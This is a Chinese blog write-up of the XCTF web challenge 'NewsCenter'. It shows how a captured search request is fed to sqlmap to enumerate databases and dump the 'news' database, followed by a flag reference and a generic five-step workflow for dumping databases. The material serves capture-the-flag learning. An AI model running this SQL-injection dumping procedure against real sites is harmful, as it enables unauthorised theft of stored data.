XCTF web NewsCenter(sqlmap简单使用)

打开网页是一个查询操作的输入框,判断应该存在sql注入。
随便输入一些东西后回车,用bp抓包,抓取的内容放到一个1.txt文件里面
之后用到sqlmap
sqlmap.py -r 1.txt --dbs 用1.txt内容去搜索对应的所有数据库名
可以爆出两个库
sqlmap.py -r 1.txt -D news --dump 建立可后台news库连接, 搜索所有的数据


sql部分常用参数

参数作用
- -data=“DATA”指明参数是哪些。例:-u “www.test.com/index.php?id=1” --data=“name=1&pass=2”
- -dbs目标服务器中有什么数据库,常用,直接用- -dbs
- -tables目标数据库有什么表,常用,直接用- -tables
- -columns目标表中有什么列,常用,直接用- -colums
-r可以将一个post请求方式的数据包保存在一个txt中。例: -r 1.txt
- -dump查询指定范围的全部数据
-D直接连目标后端接数据库
- -is-dba查看是否是管理员权限
- -current-db当前数据库
- -current-user当前用户
-T指定要列出字段的表
- -batch从不询问用户输入,使用所有默认配置
- -delay 0.2延迟参数 这个很重要

sqlmap通常的使用步骤

1.Sqlmap -u url --dbs 显示数据库管理系统中所有数据库
2.Sqlmap -u url --current -db 当前网站所使用得数据库
3.Sqlmap -u url -D 数据库名 --tables 显示当前数据库中所有数据表
4.Sqlmap -u url -D 数据库名 -T 表名 --columns 显示表中所有得字段名
5.Sqlmap -u url -D 数据库名 -T 表名 -C 字段名,字段名,字段名…(互相用逗号隔开) --dump 显示数据

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

H4ppyD0g

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值